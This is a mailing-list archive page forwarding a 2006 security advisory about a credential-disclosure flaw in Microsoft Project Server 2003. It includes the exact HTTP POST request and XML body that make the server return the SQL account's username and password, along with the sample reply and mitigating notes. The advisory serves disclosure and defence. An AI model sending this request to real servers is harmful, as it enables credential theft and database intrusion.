ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [NT] Project Server 2003 Credential Disclosure



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Wednesday, December 20, 2006 5:56 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Project Server 2003 Credential Disclosure
> 
> The following security advisory is sent to the securiteam 
> mailing list, and can be found at the SecuriTeam web site: 
> http://www.securiteam.com 
> 
> - - promotion
> 
> The SecuriTeam alerts list - Free, Accurate, Independent.
> 
> Get your security news from a reliable source.
> http://www.securiteam.com/mailinglist.html 
> 
> 
> - - - - - - - - -
> 
> 
> 
> Project Server 2003 Credential Disclosure 
> 
> 
> 
> Microsoft Project server 2003 implements a thick client for 
> some of the functionality. The thick client uses XML requests 
> to talk to the server of HTTP(S). One of these requests 
> returns the username and password of the MSProjectUser 
> account used to access the SQL database as well as other 
> system information. 
> 
> 
> Exploit: 
> POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0 
> Accept: */* 
> Accept-Language: en-nz 
> Pragma: no-cache 
> Host: SERVER 
> Content-length: 87 
> Proxy-Connection: Keep-Alive 
> Cookie: PjSessionID=<valid cookie> 
> 
> <Request> 
> <GetInitializationData> 
> <Release>1</Release> 
> </GetInitializationData> 
> </Request> 
> 
> <Reply> 
> <HRESULT>0</HRESULT> 
> <STATUS>0</STATUS> 
> <UserName>theuser</UserName> 
> <GetInitializationData> 
> <GetLoginInformation> 
> <DBType>0</DBType> 
> <DVR>{SQLServer}</DVR> 
> <DB>ProjectServer</DB> 
> <SVR>SERVER</SVR> 
> <ResGlobalID>1</ResGlobalID> 
> <ResGlobalName>resglobal</ResGlobalName> 
> <UserName>MSProjectUser</UserName> <---- 
> <Password>sekretpass</Password> <---- 
> <UserNTAccount>SERVER\USER</UserNTAccount> 
> </GetLoginInformation> 
> </Reply> 
> 
> Some quick notes that mitigate this attack: 
>  * The cookie must be a valid cookie, which is obtained via a 
> login with a valid username and password. 
>  * Since the thick client is 'client side' any SQL can be 
> manipulated anyway. 
>  * The MSProjectUser should be a low level account anyway 
>  * Other 'undocumented' or 'unauthorized' requests 'may' also 
> be able to be made through this method. 
> 
> 
> Additional Information: 
> The information has been provided by Brett Moore 
> <mailto:brett.moore@xxxxxxxxxxxxxxxxxxxxxxx> . 
> 
> 
> ==============================================================
> ================== 
> 
> 
> 
> 
> 
> This bulletin is sent to members of the SecuriTeam mailing list. 
> To unsubscribe from the list, send mail with an empty subject 
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx 
> In order to subscribe to the mailing list and receive 
> advisories in HTML format, simply forward this email to: 
> html-list-subscribe@xxxxxxxxxxxxxx 
> 
> 
> 
> ==============================================================
> ================== 
> ==============================================================
> ================== 
> 
> DISCLAIMER: 
> The information in this bulletin is provided "AS IS" without 
> warranty of any kind. 
> In no event shall we be liable for any damages whatsoever 
> including direct, indirect, incidental, consequential, loss 
> of business profits or special damages. 
> 
> 
> 
> 
> 
> 



 




Copyright © Lexa Software, 1996-2009.